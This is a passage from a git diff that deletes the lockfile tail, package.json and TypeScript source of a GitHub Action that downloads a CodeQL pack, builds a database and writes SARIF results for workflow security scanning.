"sha512-8QFz29Fg5jDuTPXVtey05BLm7OB+M8fnvE64RNegzX7U+5NUXcOcnpTIK0YfSHBg8gYd0oxIq3IZTe9SfPZiRw==", - "dependencies": { - "@octokit/types": "^6.39.0", - "deprecation": "^2.3.1" - }, - "peerDependencies": { - "@octokit/core": ">=3" - } - }, - "node_modules/@octokit/request": { - "version": "5.6.3", - "resolved": "https://registry.npmjs.org/@octokit/request/-/request-5.6.3.tgz", - "integrity": "sha512-bFJl0I1KVc9jYTe9tdGGpAMPy32dLBXXo1dS/YwSCTL/2nd9XeHsY616RE3HPXDVk+a+dBuzyz5YdlXwcDTr2A==", - "dependencies": { - "@octokit/endpoint": "^6.0.1", - "@octokit/request-error": "^2.1.0", - "@octokit/types": "^6.16.1", - "is-plain-object": "^5.0.0", - "node-fetch": "^2.6.7", - "universal-user-agent": "^6.0.0" - } - }, - "node_modules/@octokit/request-error": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-2.1.0.tgz", - "integrity": "sha512-1VIvgXxs9WHSjicsRwq8PlR2LR2x6DwsJAaFgzdi0JfJoGSO8mYI/cHJQ+9FbN21aa+DrgNLnwObmyeSC8Rmpg==", - "dependencies": { - "@octokit/types": "^6.0.3", - "deprecation": "^2.0.0", - "once": "^1.4.0" - } - }, 
- "node_modules/@octokit/types": { - "version": "6.41.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-6.41.0.tgz", - "integrity": "sha512-eJ2jbzjdijiL3B4PrSQaSjuF2sPEQPVCPzBvTHJD9Nz+9dw2SGH4K4xeQJ77YfTq5bRQ+bD8wT11JbeDPmxmGg==", - "dependencies": { - "@octokit/openapi-types": "^12.11.0" - } - }, - "node_modules/@types/node": { - "version": "20.12.7", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.12.7.tgz", - "integrity": "sha512-wq0cICSkRLVaf3UGLMGItu/PtdY7oaXaI/RVU+xliKVOtRna3PRY57ZDfztpDL0n11vfymMUnXv8QwYCO7L1wg==", - "dev": true, - "dependencies": { - "undici-types": "~5.26.4" - } - }, - "node_modules/@vercel/ncc": { - "version": "0.38.1", - "resolved": "https://registry.npmjs.org/@vercel/ncc/-/ncc-0.38.1.tgz", - "integrity": "sha512-IBBb+iI2NLu4VQn3Vwldyi2QwaXt5+hTyh58ggAMoCGE6DJmPvwL3KPBWcJl1m9LYPChBLE980Jw+CS4Wokqxw==", - "dev": true, - "bin": { - "ncc": "dist/ncc/cli.js" - } - }, - "node_modules/before-after-hook": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/before-after-hook/-/before-after-hook-2.2.3.tgz", - "integrity": "sha512-NzUnlZexiaH/46WDhANlyR2bXRopNg4F/zuSA3OpZnllCUgRaOF2znDioDWrmbNVsuZk6l9pMquQB38cfBZwkQ==" - }, - "node_modules/deprecation": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/deprecation/-/deprecation-2.3.1.tgz", - "integrity": "sha512-xmHIy4F3scKVwMsQ4WnVaS8bHOx0DmVwRywosKhaILI0ywMDWPtBSku2HNxRvF7jtwDRsoEwYQSfbxj8b7RlJQ==" - }, - "node_modules/is-plain-object": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", - "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==", - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/node-fetch": { - "version": "2.7.0", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", - "integrity": 
"sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", - "dependencies": { - "whatwg-url": "^5.0.0" - }, - "engines": { - "node": "4.x || >=6.0.0" - }, - "peerDependencies": { - "encoding": "^0.1.0" - }, - "peerDependenciesMeta": { - "encoding": { - "optional": true - } - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/prettier": { - "version": "3.2.5", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.2.5.tgz", - "integrity": "sha512-3/GWa9aOC0YeD7LUfvOG2NiDyhOWRvt1k+rcKhOuYnMY24iiCphgneUfJDyFXd6rZCAnuLBv6UeAULtrhT/F4A==", - "dev": true, - "bin": { - "prettier": "bin/prettier.cjs" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/prettier/prettier?sponsor=1" - } - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/tr46": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", - "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" - }, - "node_modules/tunnel": { - "version": "0.0.6", - "resolved": "https://registry.npmjs.org/tunnel/-/tunnel-0.0.6.tgz", - "integrity": "sha512-1h/Lnq9yajKY2PEbBadPXj3VxsDDu844OnaAo52UVmIzIvwwtBPIuNvkjuzBlTWpfJyUbG3ez0KSBibQkj4ojg==", - "engines": { - "node": ">=0.6.11 <=0.7.0 || >=0.7.3" - } - }, - "node_modules/typescript": { - "version": "5.3.3", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.3.3.tgz", - "integrity": 
"sha512-pXWcraxM0uxAS+tN0AG/BF2TyqmHO014Z070UsJ+pFvYuRSq8KH8DmWpnbXe0pEPDHXZV3FcAbJkijJ5oNEnWw==", - "dev": true, - "bin": { - "tsc": "bin/tsc", - "tsserver": "bin/tsserver" - }, - "engines": { - "node": ">=14.17" - } - }, - "node_modules/undici": { - "version": "5.28.3", - "resolved": "https://registry.npmjs.org/undici/-/undici-5.28.3.tgz", - "integrity": "sha512-3ItfzbrhDlINjaP0duwnNsKpDQk3acHI3gVJ1z4fmwMK31k5G9OVIAMLSIaP6w4FaGkaAkN6zaQO9LUvZ1t7VA==", - "dependencies": { - "@fastify/busboy": "^2.0.0" - }, - "engines": { - "node": ">=14.0" - } - }, - "node_modules/undici-types": { - "version": "5.26.5", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", - "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==", - "dev": true - }, - "node_modules/universal-user-agent": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/universal-user-agent/-/universal-user-agent-6.0.1.tgz", - "integrity": "sha512-yCzhz6FN2wU1NiiQRogkTQszlQSlpWaw8SvVegAc+bDxbzHgh1vX8uIe8OYyMH6DwH+sdTJsgMl36+mSMdRJIQ==" - }, - "node_modules/uuid": { - "version": "8.3.2", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", - "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", - "bin": { - "uuid": "dist/bin/uuid" - } - }, - "node_modules/webidl-conversions": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", - "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" - }, - "node_modules/whatwg-url": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", - "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", - "dependencies": { - "tr46": "~0.0.3", - "webidl-conversions": "^3.0.0" - } - }, - 
"node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" - } - }, - "dependencies": { - "@actions/core": { - "version": "1.10.1", - "resolved": "https://registry.npmjs.org/@actions/core/-/core-1.10.1.tgz", - "integrity": "sha512-3lBR9EDAY+iYIpTnTIXmWcNbX3T2kCkAEQGIQx4NVQ0575nk2k3GRZDTPQG+vVtS2izSLmINlxXf0uLtnrTP+g==", - "requires": { - "@actions/http-client": "^2.0.1", - "uuid": "^8.3.2" - } - }, - "@actions/exec": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/@actions/exec/-/exec-1.1.1.tgz", - "integrity": "sha512-+sCcHHbVdk93a0XT19ECtO/gIXoxvdsgQLzb2fE2/5sIZmWQuluYyjPQtrtTHdU1YzTZ7bAPN4sITq2xi1679w==", - "requires": { - "@actions/io": "^1.0.1" - } - }, - "@actions/github": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/@actions/github/-/github-5.1.1.tgz", - "integrity": "sha512-Nk59rMDoJaV+mHCOJPXuvB1zIbomlKS0dmSIqPGxd0enAXBnOfn4VWF+CGtRCwXZG9Epa54tZA7VIRlJDS8A6g==", - "requires": { - "@actions/http-client": "^2.0.1", - "@octokit/core": "^3.6.0", - "@octokit/plugin-paginate-rest": "^2.17.0", - "@octokit/plugin-rest-endpoint-methods": "^5.13.0" - } - }, - "@actions/http-client": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/@actions/http-client/-/http-client-2.2.0.tgz", - "integrity": "sha512-q+epW0trjVUUHboliPb4UF9g2msf+w61b32tAkFEwL/IwP0DQWgbCMM0Hbe3e3WXSKz5VcUXbzJQgy8Hkra/Lg==", - "requires": { - "tunnel": "^0.0.6", - "undici": "^5.25.4" - } - }, - "@actions/io": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/@actions/io/-/io-1.1.3.tgz", - "integrity": "sha512-wi9JjgKLYS7U/z8PPbco+PvTb/nRWjeoFlJ1Qer83k/3C5PHQi28hiVdeE2kHXmIL99mQFawx8qt/JPjZilJ8Q==" - }, - "@actions/tool-cache": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@actions/tool-cache/-/tool-cache-2.0.1.tgz", - "integrity": 
"sha512-iPU+mNwrbA8jodY8eyo/0S/QqCKDajiR8OxWTnSk/SnYg0sj8Hp4QcUEVC1YFpHWXtrfbQrE13Jz4k4HXJQKcA==", - "requires": { - "@actions/core": "^1.2.6", - "@actions/exec": "^1.0.0", - "@actions/http-client": "^2.0.1", - "@actions/io": "^1.1.1", - "semver": "^6.1.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" - } - } - }, - "@fastify/busboy": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-2.1.0.tgz", - "integrity": "sha512-+KpH+QxZU7O4675t3mnkQKcZZg56u+K/Ct2K+N2AZYNVK8kyeo/bI18tI8aPm3tvNNRyTWfj6s5tnGNlcbQRsA==" - }, - "@octokit/auth-token": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/@octokit/auth-token/-/auth-token-2.5.0.tgz", - "integrity": "sha512-r5FVUJCOLl19AxiuZD2VRZ/ORjp/4IN98Of6YJoJOkY75CIBuYfmiNHGrDwXr+aLGG55igl9QrxX3hbiXlLb+g==", - "requires": { - "@octokit/types": "^6.0.3" - } - }, - "@octokit/core": { - "version": "3.6.0", - "resolved": "https://registry.npmjs.org/@octokit/core/-/core-3.6.0.tgz", - "integrity": "sha512-7RKRKuA4xTjMhY+eG3jthb3hlZCsOwg3rztWh75Xc+ShDWOfDDATWbeZpAHBNRpm4Tv9WgBMOy1zEJYXG6NJ7Q==", - "requires": { - "@octokit/auth-token": "^2.4.4", - "@octokit/graphql": "^4.5.8", - "@octokit/request": "^5.6.3", - "@octokit/request-error": "^2.0.5", - "@octokit/types": "^6.0.3", - "before-after-hook": "^2.2.0", - "universal-user-agent": "^6.0.0" - } - }, - "@octokit/endpoint": { - "version": "6.0.12", - "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-6.0.12.tgz", - "integrity": "sha512-lF3puPwkQWGfkMClXb4k/eUT/nZKQfxinRWJrdZaJO85Dqwo/G0yOC434Jr2ojwafWJMYqFGFa5ms4jJUgujdA==", - "requires": { - "@octokit/types": "^6.0.3", - "is-plain-object": "^5.0.0", - "universal-user-agent": "^6.0.0" - } - }, - "@octokit/graphql": { - "version": "4.8.0", - "resolved": 
"https://registry.npmjs.org/@octokit/graphql/-/graphql-4.8.0.tgz", - "integrity": "sha512-0gv+qLSBLKF0z8TKaSKTsS39scVKF9dbMxJpj3U0vC7wjNWFuIpL/z76Qe2fiuCbDRcJSavkXsVtMS6/dtQQsg==", - "requires": { - "@octokit/request": "^5.6.0", - "@octokit/types": "^6.0.3", - "universal-user-agent": "^6.0.0" - } - }, - "@octokit/openapi-types": { - "version": "12.11.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-12.11.0.tgz", - "integrity": "sha512-VsXyi8peyRq9PqIz/tpqiL2w3w80OgVMwBHltTml3LmVvXiphgeqmY9mvBw9Wu7e0QWk/fqD37ux8yP5uVekyQ==" - }, - "@octokit/plugin-paginate-rest": { - "version": "2.21.3", - "resolved": "https://registry.npmjs.org/@octokit/plugin-paginate-rest/-/plugin-paginate-rest-2.21.3.tgz", - "integrity": "sha512-aCZTEf0y2h3OLbrgKkrfFdjRL6eSOo8komneVQJnYecAxIej7Bafor2xhuDJOIFau4pk0i/P28/XgtbyPF0ZHw==", - "requires": { - "@octokit/types": "^6.40.0" - } - }, - "@octokit/plugin-rest-endpoint-methods": { - "version": "5.16.2", - "resolved": "https://registry.npmjs.org/@octokit/plugin-rest-endpoint-methods/-/plugin-rest-endpoint-methods-5.16.2.tgz", - "integrity": "sha512-8QFz29Fg5jDuTPXVtey05BLm7OB+M8fnvE64RNegzX7U+5NUXcOcnpTIK0YfSHBg8gYd0oxIq3IZTe9SfPZiRw==", - "requires": { - "@octokit/types": "^6.39.0", - "deprecation": "^2.3.1" - } - }, - "@octokit/request": { - "version": "5.6.3", - "resolved": "https://registry.npmjs.org/@octokit/request/-/request-5.6.3.tgz", - "integrity": "sha512-bFJl0I1KVc9jYTe9tdGGpAMPy32dLBXXo1dS/YwSCTL/2nd9XeHsY616RE3HPXDVk+a+dBuzyz5YdlXwcDTr2A==", - "requires": { - "@octokit/endpoint": "^6.0.1", - "@octokit/request-error": "^2.1.0", - "@octokit/types": "^6.16.1", - "is-plain-object": "^5.0.0", - "node-fetch": "^2.6.7", - "universal-user-agent": "^6.0.0" - } - }, - "@octokit/request-error": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-2.1.0.tgz", - "integrity": 
"sha512-1VIvgXxs9WHSjicsRwq8PlR2LR2x6DwsJAaFgzdi0JfJoGSO8mYI/cHJQ+9FbN21aa+DrgNLnwObmyeSC8Rmpg==", - "requires": { - "@octokit/types": "^6.0.3", - "deprecation": "^2.0.0", - "once": "^1.4.0" - } - }, - "@octokit/types": { - "version": "6.41.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-6.41.0.tgz", - "integrity": "sha512-eJ2jbzjdijiL3B4PrSQaSjuF2sPEQPVCPzBvTHJD9Nz+9dw2SGH4K4xeQJ77YfTq5bRQ+bD8wT11JbeDPmxmGg==", - "requires": { - "@octokit/openapi-types": "^12.11.0" - } - }, - "@types/node": { - "version": "20.12.7", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.12.7.tgz", - "integrity": "sha512-wq0cICSkRLVaf3UGLMGItu/PtdY7oaXaI/RVU+xliKVOtRna3PRY57ZDfztpDL0n11vfymMUnXv8QwYCO7L1wg==", - "dev": true, - "requires": { - "undici-types": "~5.26.4" - } - }, - "@vercel/ncc": { - "version": "0.38.1", - "resolved": "https://registry.npmjs.org/@vercel/ncc/-/ncc-0.38.1.tgz", - "integrity": "sha512-IBBb+iI2NLu4VQn3Vwldyi2QwaXt5+hTyh58ggAMoCGE6DJmPvwL3KPBWcJl1m9LYPChBLE980Jw+CS4Wokqxw==", - "dev": true - }, - "before-after-hook": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/before-after-hook/-/before-after-hook-2.2.3.tgz", - "integrity": "sha512-NzUnlZexiaH/46WDhANlyR2bXRopNg4F/zuSA3OpZnllCUgRaOF2znDioDWrmbNVsuZk6l9pMquQB38cfBZwkQ==" - }, - "deprecation": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/deprecation/-/deprecation-2.3.1.tgz", - "integrity": "sha512-xmHIy4F3scKVwMsQ4WnVaS8bHOx0DmVwRywosKhaILI0ywMDWPtBSku2HNxRvF7jtwDRsoEwYQSfbxj8b7RlJQ==" - }, - "is-plain-object": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", - "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==" - }, - "node-fetch": { - "version": "2.7.0", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", - "integrity": 
"sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", - "requires": { - "whatwg-url": "^5.0.0" - } - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "requires": { - "wrappy": "1" - } - }, - "prettier": { - "version": "3.2.5", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.2.5.tgz", - "integrity": "sha512-3/GWa9aOC0YeD7LUfvOG2NiDyhOWRvt1k+rcKhOuYnMY24iiCphgneUfJDyFXd6rZCAnuLBv6UeAULtrhT/F4A==", - "dev": true - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==" - }, - "tr46": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", - "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" - }, - "tunnel": { - "version": "0.0.6", - "resolved": "https://registry.npmjs.org/tunnel/-/tunnel-0.0.6.tgz", - "integrity": "sha512-1h/Lnq9yajKY2PEbBadPXj3VxsDDu844OnaAo52UVmIzIvwwtBPIuNvkjuzBlTWpfJyUbG3ez0KSBibQkj4ojg==" - }, - "typescript": { - "version": "5.3.3", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.3.3.tgz", - "integrity": "sha512-pXWcraxM0uxAS+tN0AG/BF2TyqmHO014Z070UsJ+pFvYuRSq8KH8DmWpnbXe0pEPDHXZV3FcAbJkijJ5oNEnWw==", - "dev": true - }, - "undici": { - "version": "5.28.3", - "resolved": "https://registry.npmjs.org/undici/-/undici-5.28.3.tgz", - "integrity": "sha512-3ItfzbrhDlINjaP0duwnNsKpDQk3acHI3gVJ1z4fmwMK31k5G9OVIAMLSIaP6w4FaGkaAkN6zaQO9LUvZ1t7VA==", - "requires": { - "@fastify/busboy": "^2.0.0" - } - }, - "undici-types": { - "version": "5.26.5", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", - "integrity": 
"sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==", - "dev": true - }, - "universal-user-agent": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/universal-user-agent/-/universal-user-agent-6.0.1.tgz", - "integrity": "sha512-yCzhz6FN2wU1NiiQRogkTQszlQSlpWaw8SvVegAc+bDxbzHgh1vX8uIe8OYyMH6DwH+sdTJsgMl36+mSMdRJIQ==" - }, - "uuid": { - "version": "8.3.2", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", - "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==" - }, - "webidl-conversions": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", - "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" - }, - "whatwg-url": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", - "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", - "requires": { - "tr46": "~0.0.3", - "webidl-conversions": "^3.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" - } - } -} diff --git a/.github/action/package.json b/.github/action/package.json deleted file mode 100644 index cd9021d20c5..00000000000 --- a/.github/action/package.json +++ /dev/null 
@@ -1,48 +0,0 @@
-{
- "name": "codeql-actions-action",
- "version": "0.1.0",
- "description": "CodeQL Pack to analyze GitHub Actions and Workflows",
- "main": "dist/index.js",
- "scripts": {
- "bundle": "npm run format:write && npm run package",
- "cli": "ts-node src/index.ts",
- "ci-test": "jest",
- "format:write": "prettier --write **/*.ts",
- "format:check": "prettier --check **/*.ts",
- "lint": "npx eslint . -c ./.github/linters/.eslintrc.yml",
- "package": "ncc build src/index.ts --license licenses.txt",
- "package:watch": "npm run package -- --watch",
- "test": "(jest && make-coverage-badge --output-path ./badges/coverage.svg) || make-coverage-badge --output-path ./badges/coverage.svg",
- "all": "npm run format:write && npm run lint && npm run test && npm run package"
- },
- "repository": {
- "type": "git",
- "url": "git+https://github.com/GitHubSecurityLab/codeql-actions.git"
- },
- "exports": {
- ".": "./dist/index.js"
- },
- "keywords": [
- "codeql",
- "security",
- "actions"
- ],
- "author": "Pwntester",
- "license": "MIT",
- "bugs": {
- "url": "https://github.com/GitHubSecurityLab/codeql-actions/issues"
- },
- "homepage": "https://github.com/GitHubSecurityLab/codeql-actions#readme",
- "dependencies": {
- "@actions/core": "^1.10.1",
- "@actions/exec": "^1.1.1",
- "@actions/github": "^5.1.1",
- "@actions/tool-cache": "^2.0.1"
- },
- "devDependencies": {
- "@types/node": "^20.12.7",
- "@vercel/ncc": "^0.38.0",
- "prettier": "^3.0.3",
- "typescript": "^5.2.2"
- }
-}
diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts
deleted file mode 100644
index 5b06b007d8a..00000000000
--- a/.github/action/src/codeql.ts
+++ /dev/null
@@ -1,172 +0,0 @@ -import * as fs from "fs"; -import * as path from "path"; - -import * as core from "@actions/core"; -import * as toolcache from "@actions/tool-cache"; -import * as toolrunner from "@actions/exec/lib/toolrunner"; - -export interface CodeQLConfig { - // The path to the codeql bundle. - path: string; - // The language to use for analysis. - language: string; - // CodeQL pack to use for analysis. - pack: string; - // The codeql suite to use for analysis. - suite: string; - // The source root to use for analysis. - source_root?: string; - // The output file for the SARIF file. - output?: string; - // Extension CodeQL packs to use for analysis. - packs: string | undefined; -} - -export async function newCodeQL(): Promise { - return { - language: "javascript", - path: await findCodeQL(), - pack: "github/actions-queries", - suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, - source_root: core.getInput("source-root"), - output: core.getInput("sarif"), - packs: - core.getInput("packs").length > 0 ? 
core.getInput("packs") : undefined, - }; -} - -export async function runCommand( - config: CodeQLConfig, - args: string[], - cwd_arg?: string, -): Promise { - var bin = path.join(config.path, "codeql"); - let output = ""; - var cwd: string = process.cwd(); - if (cwd_arg) { - cwd = cwd_arg; - } - core.info("Current working directory: " + cwd); - var options = { - cwd: cwd, - listeners: { - stdout: (data: Buffer) => { - output += data.toString(); - }, - }, - }; - - await new toolrunner.ToolRunner(bin, args, options).exec(); - core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); - - return output.trim(); -} - -export async function runCommandJson( - config: CodeQLConfig, - args: string[], -): Promise { - return JSON.parse(await runCommand(config, args)); -} -async function findCodeQL(): Promise { - // check if codeql is in the toolcache - var codeqlPath = await findCodeQlInToolcache(); - if (codeqlPath !== undefined) { - return codeqlPath; - } - // default to the codeql in the path - return "codeql"; -} - -async function findCodeQlInToolcache(): Promise { - const candidates = toolcache - .findAllVersions("CodeQL") - .map((version) => ({ - folder: toolcache.find("CodeQL", version), - version, - })) - .filter(({ folder }) => fs.existsSync(path.join(folder, "pinned-version"))); - - if (candidates.length === 1) { - const candidate = candidates[0]; - core.info(`CodeQL tools found in toolcache: '${candidate.folder}'.`); - core.debug(`CodeQL toolcache version: '${candidate.version}'.`); - - return path.join(candidate.folder, "codeql"); - } - - core.warning(`No CodeQL tools found in toolcache.`); - - return undefined; -} - -export async function downloadPack(codeql: CodeQLConfig): Promise { - try { - await runCommand(codeql, ["pack", "download", codeql.pack]); - return true; - } catch (error) { - core.warning("Failed to download pack from GitHub..."); - } - return false; -} - -export async function codeqlDatabaseCreate( - codeql: CodeQLConfig, -): Promise { - 
// get runner temp directory for database - var temp = process.env["RUNNER_TEMP"]; - if (temp === undefined) { - temp = "/tmp"; - } - var database_path = path.join(temp, "codeql-actions-db"); - var source_root = - codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; - - await runCommand(codeql, [ - "database", - "create", - "--language", - codeql.language, - "--source-root", - source_root, - database_path, - ]); - - return database_path; -} - -export async function codeqlDatabaseAnalyze( - codeql: CodeQLConfig, - database_path: string, -): Promise { - var codeql_output = codeql.output || "codeql-actions.sarif"; - - var cmd = [ - "database", - "analyze", - "--format", - "sarif-latest", - "--sarif-add-query-help", - "--output", - codeql_output, - ]; - - if (codeql.packs !== undefined) { - cmd.push("--extension-packs", codeql.packs); - } - - // remote pack or local pack - if (codeql.pack.startsWith("githubsecuritylab/")) { - var suite = codeql.pack + ":" + codeql.suite; - } else { - // assume path - var suite = path.join(codeql.pack, codeql.suite); - cmd.push("--search-path", codeql.pack); - } - - cmd.push(database_path, suite); - - await runCommand(codeql, cmd); - - return codeql_output; -} diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts deleted file mode 100644 index 53a484ae6c1..00000000000 --- a/.github/action/src/index.ts +++ /dev/null 
@@ -1,61 +0,0 @@
-import * as path from "path";
-import * as core from "@actions/core";
-import * as cql from "./codeql";
-
-/**
- * The main function for the action.
- * @returns {Promise} Resolves when the action is complete.
- */
-export async function run(): Promise {
- try {
- // set up codeql
- var codeql = await cql.newCodeQL();
-
- core.debug(`CodeQL CLI found at '${codeql.path}'`);
-
- await cql.runCommand(codeql, ["version", "--format", "terse"]);
-
- // check javascript support
- var languages = await cql.runCommandJson(codeql, [
- "resolve",
- "languages",
- "--format",
- "json",
- ]);
-
- if (!languages.hasOwnProperty("javascript")) {
- core.setFailed("CodeQL javascript extractor not installed");
- throw new Error("CodeQL javascript extractor not installed");
- }
-
- // download pack
- core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`);
- var pack_downloaded = await cql.downloadPack(codeql);
-
- if (pack_downloaded === false) {
- var action_path = path.resolve(path.join(__dirname, "..", "..", ".."));
- codeql.pack = path.join(action_path, "ql", "src");
-
- core.info(`Pack defaulting back to local pack: '${codeql.pack}'`);
- } else {
- core.info(`Pack downloaded '${codeql.pack}'`);
- }
-
- core.info("Creating CodeQL database...");
- var database_path = await cql.codeqlDatabaseCreate(codeql);
-
- core.info("Running CodeQL analysis...");
- var sarif = await cql.codeqlDatabaseAnalyze(codeql, database_path);
-
- core.info(`SARIF results: '${sarif}'`);
- core.setOutput("sarif", sarif);
